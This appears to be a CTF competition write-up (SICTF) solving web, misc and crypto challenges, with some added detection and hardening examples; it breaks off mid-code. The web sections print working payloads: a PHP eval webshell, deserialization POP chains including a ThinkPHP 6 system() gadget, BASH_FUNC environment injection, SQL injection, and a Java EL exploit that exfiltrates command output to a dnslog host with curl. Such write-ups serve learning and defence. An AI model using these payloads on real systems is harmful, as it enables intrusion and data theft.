WEB

Grabbed five first bloods and one second blood (

100%_upload

Looking at the URL there is a ?file=upload.php parameter, which suggests file inclusion.

Next is the file upload: it filters keywords such as php, but the file name can be anything, and a successful upload returns the file path.

<?=eval($_POST[1])?>

?file=uploads/123.php.png includes the file just uploaded, which gives RCE.

Not just unserialize

Source:

<?php

highlight_file(__FILE__);
class start
{
    public $welcome;
    public $you;
    public function __destruct()
    {
        $this->begin0fweb();
    }
    public function begin0fweb()
    {
        $p='hacker!';
        $this->welcome->you = $p;
    }
}

class SE{
    public $year;
    public function __set($name, $value){
        echo ' Welcome to new year! ';
        echo($this->year);
    }
}

class CR {
    public $last;
    public $newyear;

    public function __tostring() {

        if (is_array($this->newyear)) {
            echo 'nonono';
            return false;
        }
        if (!preg_match('/worries/i',$this->newyear))
        {
            echo "empty it!";
            return 0;
        }

        if(preg_match('/^.*(worries).*$/',$this->newyear)) {
            echo 'Don\'t be worry';
        } else {
            echo 'Worries doesn\'t exists in the new year ';
            empty($this->last->worries);
        }
        return false;
    }
}

class ET{

    public function __isset($name)
    {
        foreach ($_GET['get'] as $inject => $rce){
            putenv("{$inject}={$rce}");
        }
        system("echo \"Haven't you get the secret?\"");
    }
}
if(isset($_REQUEST['go'])){
    unserialize(base64_decode($_REQUEST['go']));
}
?>

As can be seen, ET::__isset allows RCE through environment variable injection.

First the POP chain:

start::__destruct => SE::__set => CR::__tostring => ET::__isset

<?php

class start
{
    public $welcome;
    public $you;
    public function __destruct()
    {
        $this->begin0fweb();
    }
    public function begin0fweb()
    {
        $p='hacker!';
        $this->welcome->you = $p;
    }
}

class SE{
    public $year;
    public function __set($name, $value){
        echo ' Welcome to new year! ';
        echo($this->year);
    }
}

class CR {
    public $last;
    public $newyear="\nworries";

    public function __tostring() {
        echo "__tostring";

        if (is_array($this->newyear)) {
            echo 'nonono';
            return false;
        }
        if (!preg_match('/worries/i',$this->newyear))
        {
            echo "empty it!";
            return 0;
        }

        if(preg_match('/^.*(worries).*$/',$this->newyear)) {
            echo 'Don\'t be worry';
        } else {
            echo 'Worries doesn\'t exists in the new year ';
            empty($this->last->worries);
        }
        return false;
    }
}

class ET{

    public function __isset($name)
    {
        echo "yes";
        foreach ($_GET['get'] as $inject => $rce){
            putenv("{$inject}={$rce}");
        }
        system("echo \"Haven't you get the secret?\"");
    }
}
$a = new start();
$a->welcome=new SE();
$a->welcome->year = new CR();
$a->welcome->year->last = new ET();

echo base64_encode(serialize($a));

// Tzo1OiJzdGFydCI6Mjp7czo3OiJ3ZWxjb21lIjtPOjI6IlNFIjoxOntzOjQ6InllYXIiO086MjoiQ1IiOjI6e3M6NDoibGFzdCI7TzoyOiJFVCI6MDp7fXM6NzoibmV3eWVhciI7czo4OiIKd29ycmllcyI7fX1zOjM6InlvdSI7Tjt9

Next, some PHP quirks:

if (is_array($this->newyear)) {
    echo 'nonono';
    return false;
}
if (!preg_match('/worries/i',$this->newyear))
{
    echo "empty it!";
    return 0;
}

if(preg_match('/^.*(worries).*$/',$this->newyear)) {
    echo 'Don\'t be worry';
} else {
    echo 'Worries doesn\'t exists in the new year ';
    empty($this->last->worries);
}

A newline satisfies both regex requirements, i.e. \nworries: the unanchored /worries/i still matches, but /^.*(worries).*$/ does not, because without the s modifier . does not match \n, so the else branch runs empty($this->last->worries) and triggers __isset.

Reference: preg_match bypass summary (preg_match绕过总结)
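As an added illustration (not part of the original writeup), the following Python snippet reproduces the two regex behaviours behind this trick with Python's re module, whose default "." and "$" semantics match PCRE's here: weak_check mirrors the challenge's /^.*(worries).*$/, and strict_check is the hardened form using DOTALL plus fullmatch (in PHP that is the s modifier with \A and \z anchors). The sample strings are constructed for this example.

```python
import re

# Constructed sample inputs for this example (not from the challenge server).
SAMPLES = ["worries", "\nworries", "worries\n", "no such word"]


def weak_check(s: str) -> bool:
    """Mirrors /^.*(worries).*$/ : '.' does not match '\\n', so a leading
    newline defeats the anchored pattern, while '$' still accepts a trailing one."""
    return re.search(r"^.*(worries).*$", s) is not None


def strict_check(s: str) -> bool:
    """Hardened form: DOTALL lets '.' span newlines and fullmatch anchors to
    the real start and end of the string (no 'before trailing newline' rule)."""
    return re.fullmatch(r".*worries.*", s, flags=re.DOTALL) is not None


def compare(samples=SAMPLES):
    """Return {input: (weak_result, strict_result)} for each sample."""
    return {s: (weak_check(s), strict_check(s)) for s in samples}


if __name__ == "__main__":
    for text, (weak, strict) in compare().items():
        print(repr(text), "weak:", weak, "strict:", strict)
```

The "\nworries" row is the whole point: the weak pattern reports no match, which in the challenge is exactly the branch that reaches the dangerous code, while the DOTALL/fullmatch form sees the word regardless of surrounding newlines.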

Finally, RCE via environment variable injection.

Reference: How I used environment variable injection to execute arbitrary commands (我是如何利用环境变量注入执行任意命令)

GET: get[BASH_FUNC_echo%25%25]=()%20{%20cat%20/f*;%20}
POST: go=Tzo1OiJzdGFydCI6Mjp7czo3OiJ3ZWxjb21lIjtPOjI6IlNFIjoxOntzOjQ6InllYXIiO086MjoiQ1IiOjI6e3M6NDoibGFzdCI7TzoyOiJFVCI6MDp7fXM6NzoibmV3eWVhciI7czo4OiIKd29ycmllcyI7fX1zOjM6InlvdSI7Tjt9
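From the detection side, the tell-tale of this technique is a request whose parameter names are environment variable names (BASH_FUNC_name%% exports a bash function, LD_PRELOAD loads a library) or whose values start with a bash function body. The following Python screen, added here and not part of the original writeup, decodes query strings and flags both indicators; the request lines are constructed for this example (one reuses the payload shape above), and screen_query / screen_all are this example's own names.

```python
import re
from urllib.parse import urlsplit, parse_qsl

# Constructed sample request targets for this example (not real traffic).
REQUESTS = [
    "/?go=dGVzdA%3D%3D",
    "/?get[BASH_FUNC_echo%25%25]=()%20{%20cat%20/f*;%20}",
    "/?get[LD_PRELOAD]=/tmp/x.so",
    "/?name=alice&lang=en",
]

# Environment variable names that change how a child process behaves.
# They may appear bare (KEY) or as an array index (arr[KEY]), as in the challenge.
DANGEROUS_ENV = re.compile(
    r"(^|\[)(BASH_FUNC_\w+%%|BASH_ENV|LD_PRELOAD|LD_LIBRARY_PATH|PATH)\]?$"
)
# A value of the form "() { ... }" is an exported bash function body.
FUNC_EXPORT = re.compile(r"^\s*\(\)\s*\{")


def screen_query(target: str):
    """Return a list of (param_name, reason) findings for one request target."""
    query = urlsplit(target).query
    findings = []
    for key, value in parse_qsl(query, keep_blank_values=True):
        if DANGEROUS_ENV.search(key):
            findings.append((key, "env-var name in parameter key"))
        if FUNC_EXPORT.match(value):
            findings.append((key, "bash function export body in value"))
    return findings


def screen_all(targets=REQUESTS):
    return {t: screen_query(t) for t in targets}


if __name__ == "__main__":
    for target, found in screen_all().items():
        print(target, "->", found or "clean")
```

The real fix is on the server: never call putenv() with a name or value taken from the request, and treat any system()/exec() call after user-influenced putenv() as command execution.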

Flag obtained.

hacker

Viewing the page source gives a hint.

or is filtered, so column names cannot be queried; use column-name-less injection.

Reference: SQL injection without column names (SQL注入之无列名注入)

BUU practice notes: [网鼎杯 2020 朱雀组]phpweb & [SWPU2019]Web1

The earlier steps of enumerating database and table names can be skipped; reuse the ready-made payload to query the flag table directly.

username=flag'union/**/select/**/(select/**/group_concat(`2`)/**/from/**/(select/**/1,2/**/union/**/select*from/**/flag)n)%23

EZ_SSRF

Just read the file with the file protocol: /var/www/html/flag.php. (The challenge author lied and said the flag was in /flag

Base64-decode to get the flag

<?php
$flag = 'SICTF{8ce2ea5d-82b5-4fe0-9d86-efe9a0df693a}';
?>

Oyst3rPHP

Deserialization in thinkphp 6.0.*, plus quirks of preg_match and md5.

First fetch /www.zip to get the source; its Readme.md shows this is tp6.

Part of the source:

public function index()
{
    echo "RT,一个很简单的Web,给大家送一点分,再送三只生蚝,过年一起吃生蚝哈";
    echo "<img src='../Oyster.png'"."/>";


    $payload = base64_decode(@$_POST['payload']);
    $right = @$_GET['left'];
    $left = @$_GET['right'];

    $key = (string)@$_POST['key'];
    if($right !== $left && md5($right) == md5($left)){

        echo "Congratulations on getting your first oyster";
        echo "<img src='../Oyster1.png'"."/>";

        if(preg_match('/.+?THINKPHP/is', $key)){
            die("Oysters don't want you to eat");
        }
        if(stripos($key, '603THINKPHP') === false){
            die("!!!Oysters don't want you to eat!!!");
        }

        echo "WOW!!!Congratulations on getting your second oyster";
        echo "<img src='../Oyster2.png'"."/>";

        @unserialize($payload);
        // The last oyster is in the root directory and it contains the Flag??? How do you find it??? What is its name???
        // A comment somewhere in the source gives a hint; it depends on whether you really understand the Oyst3rphp framework!!!
        // Small tip: the "skinny dog" (细狗) function ┗|`O′|┛ awoo~~
    }
}

First an md5 loose comparison (==), then bypassing preg_match by exceeding the regex backtracking limit, and finally deserialization. The second step works because preg_match returns false, not 0, when pcre.backtrack_limit is exceeded, and if(false) is treated as "no match", so the die() is skipped.

Reference: Bypassing preg_match via the regex backtracking limit (利用正则回溯最大次数上限绕过preg_match)
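To make the md5 step concrete, here is an added Python example (not from the original writeup) that emulates PHP's loose == on two digest strings: when both operands are numeric strings PHP compares them as numbers, and a digest of the form 0e<digits> is 0 × 10^k = 0. php_loose_equal is a simplified emulation written for this example, not PHP's own implementation; the two inputs are the ones used in the request above.

```python
import hashlib
import hmac
import re

# A PHP "numeric string": optional sign, digits, optional fraction and exponent.
NUMERIC = re.compile(r"^\s*[+-]?(\d+(\.\d*)?|\.\d+)([eE][+-]?\d+)?\s*$")


def php_loose_equal(a: str, b: str) -> bool:
    """Emulate PHP's == between two strings: numeric strings compare as numbers.
    '0e<digits>' parses as 0.0, so two such digests are 'equal'."""
    if NUMERIC.match(a) and NUMERIC.match(b):
        return float(a) == float(b)
    return a == b


def php_strict_equal(a: str, b: str) -> bool:
    """What === (or better, hash_equals()) does: byte-for-byte comparison.
    hmac.compare_digest is Python's constant-time equivalent of hash_equals()."""
    return hmac.compare_digest(a.encode(), b.encode())


def md5_hex(s: str) -> str:
    return hashlib.md5(s.encode()).hexdigest()


def demo(left: str = "240610708", right: str = "s878926199a"):
    """Hash the two challenge inputs and compare them both ways."""
    l, r = md5_hex(left), md5_hex(right)
    return {
        "left_md5": l,
        "right_md5": r,
        "loose": php_loose_equal(l, r),    # True: both are 0e... digests
        "strict": php_strict_equal(l, r),  # False: the strings differ
    }


if __name__ == "__main__":
    for k, v in demo().items():
        print(f"{k}: {v}")
```

The takeaway for code review is that any == between a user-controlled hash and a stored one (or between two hashes of user input, as here) is a bug; use === or hash_equals() so that the comparison never falls into numeric mode.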

For the deserialization, just take a ready-made POP chain from the internet.

<?php
namespace think\model\concern;

trait Attribute
{
    private $data = ["key"=>"cat /Oyst3333333r.php"]; // put the command here
    private $withAttr = ["key"=>"system"];
}
namespace think;
abstract class Model
{
    use model\concern\Attribute;
    private $lazySave = true;
    protected $withEvent = false;
    private $exists = true;
    private $force = true;
    protected $name;
    public function __construct($obj=""){
        $this->name=$obj;
    }
}
namespace think\model;
use think\Model;
class Pivot extends Model
{}
$a=new Pivot();
$b=new Pivot($a);
echo base64_encode(serialize($b));
// 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

Because the default backtracking limit is 1,000,000, the key is padded with more than a million characters, which is too long to paste by hand, so a Python script sends it.

import requests

# md5 loose comparison: both md5("240610708") and md5("s878926199a") are "0e..." digests,
# which PHP's == compares as the number 0
url = "http://yuanshen.life:37255/?left=240610708&right=s878926199a"

# 1,000,100 'a' characters push /.+?THINKPHP/is past pcre.backtrack_limit (1,000,000 by default),
# so preg_match() returns false and the die() is skipped, while stripos() still finds "603THINKPHP"
data = {"key": 'a' * 1000100 + "603THINKPHP", "payload": "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"}

r = requests.post(url, data=data).text

print(r)

Flag obtained.

[Advanced] elInjection

The challenge states that it is EL injection.

Test first: entering ${null==null} is echoed back unchanged, while ${null1==null} produces an error, so presumably whenever the expression evaluates successfully its value is returned.

Reference: A brief analysis of EL expression injection vulnerabilities (first published on 先知)

Java EL (Expression Language) injection

Because invoke is filtered, reflection cannot be used for the bypass.

ScriptEngine can be used to call the JS engine instead, but at first this did not execute: getRuntime is filtered as well.

Obtain characters with charAt and toChars, turn them into strings with toString and join them with concat to get around the filtering of sensitive strings.

dnslog gets a response, so exfiltrate the output via dnslog.

exp:

import requests
import base64

def encode(payload):
    # build each character as true.toString().charAt(0).toChars(code)[0].toString()
    # and chain them with concat so no filtered keyword appears literally
    encode_payload = ""
    for i in range(0, len(payload)):
        if i == 0:
            encode_payload += "true.toString().charAt(0).toChars(%d)[0].toString()" % ord(payload[0])
        else:
            encode_payload += ".concat(true.toString().charAt(0).toChars(%d)[0].toString())" % ord(payload[i])
    return encode_payload

# put the command here
cmd = b"curl `/readflag`.kbqsag.ceye.io"

#print(base64.b64encode(cmd))

exp = '${"".getClass().forName("javax.script.ScriptEngineManager").newInstance().getEngineByName("JavaScript").eval(%s)}' % (encode("java.lang.Runtime.getRuntime().exec(\"bash -c {echo,"+base64.b64encode(cmd).decode()+"}|{base64,-d}|{bash,-i}\")"))
#print(exp)

url = "http://yuanshen.life:23333/test"

data = {'exp': exp}
r = requests.post(url, data).text

print(r)

At first I didn't know /readflag existed, so I used grep to list the entries of the root directory containing an f

cmd = b"curl `ls /|grep 'f'`.kbqsag.ceye.io"

This showed a readflag; running it gives the flag

cmd = b"curl `/readflag`.kbqsag.ceye.io"

SICTF in upper case, the rest in lower case, then add the braces

SICTF{64177ed4-9254-dc2f-8d30-88aaef1b8264}

misc

GeekChallege

Guess the password; it cannot be guessed a whole character set at a time, it has to be one character at a time

Put characters that have already appeared at the front of the dictionary to speed things up.

import string
from pwn import *

#context.log_level="debug"

p = remote("yuanshen.life", 34905)
dic = string.printable
p.recvuntil(b'>')
pwd = ""
pwdlen = 113
lst = ""
for i in range(114):
    print(i, pwd)
    for j in dic:
        # guess one more character and pad the rest with '0' up to the full length
        payload = pwd + j + '0' * (pwdlen - len(pwd))
        p.sendline(payload.encode())
        a = p.recvuntil(b'\n').decode()
        # the reply contains one '1' per correct leading character
        if '1' * (len(pwd) + 1) in a:
            print(a)
            # move characters that have appeared to the front of the dictionary
            if j not in lst:
                lst += j
                dic = j + dic
            pwd += j
            break

p.interactive()

真💨签到 (Real 💨 check-in)

There is a string at the end of the zip

5456545454565458414259555854585458434152595958415a435959595558563d

Hex-decoding gives

TVTTTVTXABYUXTXTXCARYYXAZCYYYUXV=

Decode it with the "text encrypted as letters" scheme to get the archive password.

Online site: 文本加密为字母 (text-to-letters encoder)

2024HappyNewYear

After extracting, analyse the audio; lowering the sample rate reveals the key

givemeyourlagrange

Finally the audio file's name:

LagrangeisCapatlized

Split it up:

Lagrange is Capatlized

The hint says that Lagrange in the key obtained above should be upper case. (The challenge author misspelled it as Capatlized -_-!)

Final key

givemeyourLAGRANGE

Extract from the jpg with steghide to get the flag.

SICTF{T3e_endless_Lagrange_is_really_fun!}

WHO?WHO?WHO

Brute-force the archive password with the rockyou.txt wordlist; the password is qweqwe

After extracting, the character count is wrong, so suspect zero-width steganography; decode it with an online site.

Site: zero-width-lib

Result:

U2FsdGVkX19uvldJ6CGUNff3B28QEdIjZqgUh98K+/0J16ELU8WVQydohw4P5+2MjbhTLQHNOpcoOd7kSRgy8pwpovCmimdD8M0IbYUeXjNKYePL/WP4PCMaOJHAW3HRb7IEoDDH1NYh3o5NwMmcFEqy1ujf72VgQIQkaeYFFFE=

Guess that it is Rabbit encryption with the key shumu; it decrypts.

Site: 在线加密解密 (online encryption/decryption, 采用实现)

Result:

GTAGAGCTAGTCCTT{GGGTCACGGTTC_GGGTCACGGTTC_GAACGGTTC_GTAGTG_GCTTCA_GTAGACGTGGCGGTG_GTAGACTCA_TATGACCGG_GCTCGGGCT}

DNA cipher; find a script and adapt it

Site: DNA-Cipher-Script-CTF

mapping = {
'AAA':'a','AAC':'b','AAG':'c','AAT':'d','ACA':'e','ACC':'f', 'ACG':'g','ACT':'h','AGA':'i','AGC':'j','AGG':'k','AGT':'l','ATA':'m','ATC':'n','ATG':'o','ATT':'p','CAA':'q','CAC':'r','CAG':'s','CAT':'t','CCA':'u','CCC':'v','CCG':'w','CCT':'x','CGA':'y','CGC':'z','CGG':'A','CGT':'B','CTA':'C','CTC':'D','CTG':'E','CTT':'F','GAA':'G','GAC':'H','GAG':'I','GAT':'J','GCA':'K','GCC':'L','GCG':'M','GCT':'N','GGA':'O','GGC':'P','GGG':'Q','GGT':'R','GTA':'S','GTC':'T','GTG':'U','GTT':'V','TAA':'W','TAC':'X','TAG':'Y','TAT':'Z','TCA':'1','TCC':'2','TCG':'3','TCT':'4','TGA':'5','TGC':'6','TGG':'7','TGT':'8','TTA':'9','TTC':'0','TTG':' ','TTT':'.'}


def decode_dna(string):
    """Decode three-letter codons; '{', '_' and '}' are passed through unchanged."""
    final = ""
    i = 0
    while i < len(string):
        # check the separator first so the string end is never indexed past its length
        if string[i] in "{_}":
            final += string[i]
            i += 1
            continue
        final += mapping[string[i:i+3]]
        i += 3
    return final

input_string = "GTAGAGCTAGTCCTT{GGGTCACGGTTC_GGGTCACGGTTC_GAACGGTTC_GTAGTG_GCTTCA_GTAGACGTGGCGGTG_GTAGACTCA_TATGACCGG_GCTCGGGCT}"

flag = decode_dna(input_string)
print(flag)

# SICTF{Q1A0_Q1A0_GA0_SU_N1_SHUMU_SH1_ZHA_NAN}

日志分析2 (Log Analysis 2)

The IP address can be found in error.log1

10.11.35.95

Looking at access.log.1, there are many repeated requests to login, which must be password brute forcing

暴力破解 (brute force)

Searching for sql shows sqlmap and its version number.

sqlmap 1.2.4.18

The last one is presumably AntSword; searching for ant confirms it and gives the name and version number

antSword/v2.1
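Added example (not from the original writeup): the same three findings extracted programmatically from a handful of Apache-style access log lines. The lines are made up for this example, not the challenge's real log, though they reuse the IP, tool names and versions above; parse, find_bruteforce, find_tools and summarize are this example's own names.

```python
import re
from collections import Counter

# Constructed sample access log lines for this example (not the challenge's log).
LOG_LINES = """\
10.11.35.95 - - [10/Jan/2024:10:00:01 +0800] "POST /login HTTP/1.1" 200 512 "-" "Mozilla/5.0"
10.11.35.95 - - [10/Jan/2024:10:00:02 +0800] "POST /login HTTP/1.1" 200 512 "-" "Mozilla/5.0"
10.11.35.95 - - [10/Jan/2024:10:00:02 +0800] "POST /login HTTP/1.1" 200 512 "-" "Mozilla/5.0"
10.11.35.95 - - [10/Jan/2024:10:00:03 +0800] "POST /login HTTP/1.1" 302 0 "-" "Mozilla/5.0"
10.11.35.95 - - [10/Jan/2024:10:05:00 +0800] "GET /item.php?id=1%27 HTTP/1.1" 500 0 "-" "sqlmap/1.2.4.18#stable (http://sqlmap.org)"
10.11.35.95 - - [10/Jan/2024:10:30:00 +0800] "POST /uploads/shell.php HTTP/1.1" 200 88 "-" "antSword/v2.1"
192.168.1.20 - - [10/Jan/2024:10:31:00 +0800] "GET /index.php HTTP/1.1" 200 1024 "-" "Mozilla/5.0"
""".splitlines()

# Apache "combined" format: ip ident user [time] "method path proto" status size "referer" "user-agent"
LINE_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>\S+) (?P<path>\S+) [^"]*" (?P<status>\d{3}) \S+ "[^"]*" "(?P<ua>[^"]*)"$'
)

# User-Agent fingerprints of the two tools the writeup identifies, with a version capture.
TOOL_RE = {
    "sqlmap": re.compile(r"sqlmap/([\d.]+)"),
    "antSword": re.compile(r"antSword/v?([\d.]+)"),
}


def parse(lines=LOG_LINES):
    """Parse log lines into dicts; lines that do not fit the format are skipped."""
    entries = []
    for line in lines:
        m = LINE_RE.match(line)
        if m:
            entries.append(m.groupdict())
    return entries


def find_bruteforce(entries, path="/login", threshold=3):
    """IPs that POSTed to the login path at least `threshold` times."""
    counts = Counter(e["ip"] for e in entries if e["method"] == "POST" and e["path"] == path)
    return {ip: n for ip, n in counts.items() if n >= threshold}


def find_tools(entries):
    """Tool name -> version for every known tool seen in a User-Agent."""
    seen = {}
    for e in entries:
        for name, rx in TOOL_RE.items():
            m = rx.search(e["ua"])
            if m:
                seen[name] = m.group(1)
    return seen


def summarize(lines=LOG_LINES):
    entries = parse(lines)
    return {"bruteforce": find_bruteforce(entries), "tools": find_tools(entries)}


if __name__ == "__main__":
    print(summarize())
```

On a real log the threshold would be tuned per endpoint and time window, and the User-Agent table extended; the point is that the three artefacts the flag asks for (source IP, brute-force behaviour, tool names with versions) all fall out of structured parsing rather than text search.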

Final flag:

SICTF{10.11.35.95|暴力破解|sqlmap|1.2.4.18|蚁剑|2.1}

crypto

[Check-in] Vigenere

Brute-force it on an online site

Online site: Vigenère Solver

SuperbRSA

Source:

#user:mumu666
from Crypto.Util.number import *
p=getPrime(1024)
q=getPrime(1024)
n=p*q
e1=55
e2=200
m=bytes_to_long("flag")
assert(pow(m,5) < n)
c1 = pow(m, e1, n)
c2 = pow(m, e2, n)
print("n=",n)
print("c1=",c1)
print("c2=",c2)

n= 19006830358118902392432453595802675566730850352890246995920642811967821259388009049803513102750594524106471709641202019832682438027312468849299985832675191795417160553379580813410722359089872519372049229233732405993062464286888889084640878784209014165871696882564834896322508054231777967011195636564463806270998326936161449009988434249178477100127347406759932149010712091376183710135615375272671888541233275415737155953323133439644529709898791881795186775830217884663044495979067807418758455237701315019683802437323177125493076113419739827430282311018083976114158159925450746712064639569301925672742186294237113199023
c1= 276245243658976720066605903875366763552720328374098965164676247771817997950424168480909517684516498439306387133611184795758628248588201187138612090081389226321683486308199743311842513053259894661221013008371261704678716150646764446208833447643781574516045641493770778735363586857160147826684394417412837449465273160781074676966630398315417741542529612480836572205781076576325382832502694868883931680720558621770570349864399879523171995953720198118660355479626037129047327185224203109006251809257919143284157354935005710902589809259500117996982503679601132486140677013625335552533104471327456798955341220640782369529
c2= 11734019659226247713821792108026989060106712358397514827024912309860741729438494689480531875833287268454669859568719053896346471360750027952226633173559594064466850413737504267807599435679616522026241111887294138123201104718849744300769676961585732810579953221056338076885840743126397063074940281522137794340822594577352361616598702143477379145284687427705913831885493512616944504612474278405909277188118896882441812469679494459216431405139478548192152811441169176134750079073317011232934250365454908280676079801770043968006983848495835089055956722848080915898151352242215210071011331098761828031786300276771001839021

Common modulus attack: gcd(55, 200) = 5, so the extended gcd coefficients combine c1 and c2 into m^5 mod n; since the challenge asserts m^5 < n, taking the integer 5th root recovers m.

n= 19006830358118902392432453595802675566730850352890246995920642811967821259388009049803513102750594524106471709641202019832682438027312468849299985832675191795417160553379580813410722359089872519372049229233732405993062464286888889084640878784209014165871696882564834896322508054231777967011195636564463806270998326936161449009988434249178477100127347406759932149010712091376183710135615375272671888541233275415737155953323133439644529709898791881795186775830217884663044495979067807418758455237701315019683802437323177125493076113419739827430282311018083976114158159925450746712064639569301925672742186294237113199023
c1= 276245243658976720066605903875366763552720328374098965164676247771817997950424168480909517684516498439306387133611184795758628248588201187138612090081389226321683486308199743311842513053259894661221013008371261704678716150646764446208833447643781574516045641493770778735363586857160147826684394417412837449465273160781074676966630398315417741542529612480836572205781076576325382832502694868883931680720558621770570349864399879523171995953720198118660355479626037129047327185224203109006251809257919143284157354935005710902589809259500117996982503679601132486140677013625335552533104471327456798955341220640782369529
c2= 11734019659226247713821792108026989060106712358397514827024912309860741729438494689480531875833287268454669859568719053896346471360750027952226633173559594064466850413737504267807599435679616522026241111887294138123201104718849744300769676961585732810579953221056338076885840743126397063074940281522137794340822594577352361616598702143477379145284687427705913831885493512616944504612474278405909277188118896882441812469679494459216431405139478548192152811441169176134750079073317011232934250365454908280676079801770043968006983848495835089055956722848080915898151352242215210071011331098761828031786300276771001839021
e1=55
e2=200
import gmpy2
import libnum
# extended gcd: s1*e1 + s2*e2 = s = gcd(e1, e2) = 5
s,s1,s2=gmpy2.gcdext(e1,e2)
# c1^s1 * c2^s2 = m^(s1*e1 + s2*e2) = m^5 mod n; gmpy2 handles the negative exponent as a modular inverse
m=(pow(c1,s1,n)*pow(c2,s2,n))%n
# m^5 < n, so the integer 5th root is exact
m = gmpy2.iroot(m,s)[0]
print(libnum.n2s(int(m)).decode())

# SICTF{S0_Great_RSA_Have_Y0u_Learned?}
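Added example, not from the original writeup: a dependency-free Python version of the common-modulus attack above, run on constructed toy parameters (two small well-known primes and the integer message 1234) so that it executes instantly. recover_message works unchanged on the challenge's n, c1, c2 with e1=55 and e2=200, after which the integer only needs converting to bytes. egcd, iroot, common_modulus and recover_message are this example's own names; it needs Python 3.8+ for pow(x, -1, n).

```python
def egcd(a, b):
    """Extended Euclid: returns (g, s, t) with s*a + t*b == g == gcd(a, b)."""
    if b == 0:
        return a, 1, 0
    g, s, t = egcd(b, a % b)
    return g, t, s - (a // b) * t


def iroot(x, k):
    """Exact integer k-th root of x, or None if x is not a perfect k-th power."""
    lo, hi = 0, 1 << ((x.bit_length() + k - 1) // k + 1)
    while lo < hi:                      # smallest mid with mid**k >= x
        mid = (lo + hi) // 2
        if mid ** k < x:
            lo = mid + 1
        else:
            hi = mid
    return lo if lo ** k == x else None


def common_modulus(n, e1, c1, e2, c2):
    """Return (g, m^g mod n) from two ciphertexts of the same m under one modulus."""
    g, s1, s2 = egcd(e1, e2)

    def modpow(c, s):
        # a negative coefficient means c^s = (c^-1)^|s|; pow(c, -1, n) needs Python 3.8+
        return pow(c, s, n) if s >= 0 else pow(pow(c, -1, n), -s, n)

    return g, modpow(c1, s1) * modpow(c2, s2) % n


def recover_message(n, e1, c1, e2, c2):
    """m itself when gcd(e1, e2) == 1; otherwise the g-th root, valid only if m^g < n."""
    g, mg = common_modulus(n, e1, c1, e2, c2)
    return mg if g == 1 else iroot(mg, g)


# Constructed toy instance for this example: two known primes, a small integer message.
P, Q = 1000000007, 998244353
N = P * Q
M = 1234
E1, E2 = 55, 200
C1, C2 = pow(M, E1, N), pow(M, E2, N)


def demo():
    return recover_message(N, E1, C1, E2, C2)


if __name__ == "__main__":
    print("recovered:", demo(), "expected:", M)
```

The defender's reading of this attack: the moment two public exponents share one modulus, the ciphertexts leak m^gcd(e1, e2) to anyone holding both, with no private key involved. Every key pair needs its own modulus, and any textbook-RSA scheme without padding is fragile in exactly this way.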

gggcccddd

Source:

from Crypto.Util.number import *
from enc import flag

m = bytes_to_long(flag)

p = getPrime(512)
q = getPrime(512)
n = p*q
e = 65537
c1 = pow(m,e,n)
c2 = pow(233*m+9527,e,n)
print(f'n = {n}')
print(f'c1 = {c1}')
print(f'c2 = {c2}')
print(f'e = {e}')
"""
n = 71451784354488078832557440841067139887532820867160946146462765529262021756492415597759437645000198746438846066445835108438656317936511838198860210224738728502558420706947533544863428802654736970469313030584334133519644746498781461927762736769115933249195917207059297145965502955615599481575507738939188415191
c1 = 60237305053182363686066000860755970543119549460585763366760183023969060529797821398451174145816154329258405143693872729068255155086734217883658806494371105889752598709446068159151166250635558774937924668506271624373871952982906459509904548833567117402267826477728367928385137857800256270428537882088110496684
c2 = 20563562448902136824882636468952895180253983449339226954738399163341332272571882209784996486250189912121870946577915881638415484043534161071782387358993712918678787398065688999810734189213904693514519594955522460151769479515323049821940285408228055771349670919587560952548876796252634104926367078177733076253
e = 65537
"""

Franklin-Reiter related-message attack: plug the values into the template and let Sage grind it out, which takes a very long time.

Script:

# sage
n = 71451784354488078832557440841067139887532820867160946146462765529262021756492415597759437645000198746438846066445835108438656317936511838198860210224738728502558420706947533544863428802654736970469313030584334133519644746498781461927762736769115933249195917207059297145965502955615599481575507738939188415191
c1 = 60237305053182363686066000860755970543119549460585763366760183023969060529797821398451174145816154329258405143693872729068255155086734217883658806494371105889752598709446068159151166250635558774937924668506271624373871952982906459509904548833567117402267826477728367928385137857800256270428537882088110496684
c2 = 20563562448902136824882636468952895180253983449339226954738399163341332272571882209784996486250189912121870946577915881638415484043534161071782387358993712918678787398065688999810734189213904693514519594955522460151769479515323049821940285408228055771349670919587560952548876796252634104926367078177733076253
e = 65537
a = 233
b = 9527

def franklinReiter(n,e,c1,c2,a,b):
    PR.<x> = PolynomialRing(Zmod(n))
    g1 = (x)^e - c1
    g2 = (a*x+b)^e - c2

    def gcd(g1, g2):
        # plain Euclid on degree-65537 polynomials: correct, but this is what takes so long
        while g2:
            g1, g2 = g2, g1 % g2
        return g1.monic()
    # the gcd is x - m, so the negated constant term is m
    return -gcd(g1, g2)[0]

m = int(franklinReiter(n,e,c1,c2,a,b))

# convert via to_bytes rather than hex(): an odd-length hex string would break bytes.fromhex()
print(m.to_bytes((m.bit_length() + 7) // 8, 'big'))

# SICTF{45115fb2-84d6-4369-88c2-c8c3d72b4c55}
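Added example (not from the original writeup): a pure-Python, dependency-free version of the Franklin-Reiter attack on constructed toy parameters (two small well-known primes, e=3, the page's a=233 and b=9527, and a made-up message), so it finishes instantly. The polynomial helpers trim/add/mul/power/rem/gcd_monic and the function franklin_reiter are this example's own; the algorithm is the same Euclidean gcd the Sage script runs, which is also why the naive version is so slow at e=65537.

```python
# Polynomials over Z/nZ are lists of coefficients, lowest degree first.

def trim(p):
    """Drop leading zero coefficients in place and return the list."""
    while p and p[-1] == 0:
        p.pop()
    return p


def add(p, q, n, sign=1):
    """p + sign*q mod n."""
    r = [0] * max(len(p), len(q))
    for i, c in enumerate(p):
        r[i] = c % n
    for i, c in enumerate(q):
        r[i] = (r[i] + sign * c) % n
    return trim(r)


def mul(p, q, n):
    r = [0] * (len(p) + len(q) - 1)
    for i, a in enumerate(p):
        for j, b in enumerate(q):
            r[i + j] = (r[i + j] + a * b) % n
    return trim(r)


def power(p, e, n):
    """p^e by square-and-multiply."""
    result, base = [1], p
    while e:
        if e & 1:
            result = mul(result, base, n)
        base = mul(base, base, n)
        e >>= 1
    return result


def rem(p, q, n):
    """Remainder of p divided by q; the leading coefficient of q must be a unit mod n
    (for a random RSA modulus it always is unless you have just factored n)."""
    p = p[:]
    inv = pow(q[-1], -1, n)
    while len(p) >= len(q):
        coef = p[-1] * inv % n
        shift = len(p) - len(q)
        for i, c in enumerate(q):
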